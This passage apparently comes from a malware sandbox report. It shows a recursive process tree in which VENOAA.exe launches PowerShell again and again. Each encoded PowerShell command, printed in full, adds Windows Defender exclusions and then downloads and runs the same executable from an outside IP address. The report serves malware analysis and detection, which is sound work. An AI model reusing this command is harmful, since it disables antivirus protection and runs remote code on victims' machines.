IAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="108⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4516 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"109⤵
- Checks computer location settings
- Executes dropped EXE
PID:2644 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="110⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1680 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"111⤵
- Executes dropped EXE
PID:1212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="112⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4828 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"113⤵
- Checks computer location settings
- Executes dropped EXE
PID:3608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="114⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3380 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"115⤵
- Executes dropped EXE
PID:4984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="116⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"117⤵
- Checks computer location settings
- Executes dropped EXE
PID:3648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="118⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:920 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"119⤵
- Executes dropped EXE
PID:4196 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="120⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:4340 -
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"121⤵
- Executes dropped EXE
PID:2192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="122⤵
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-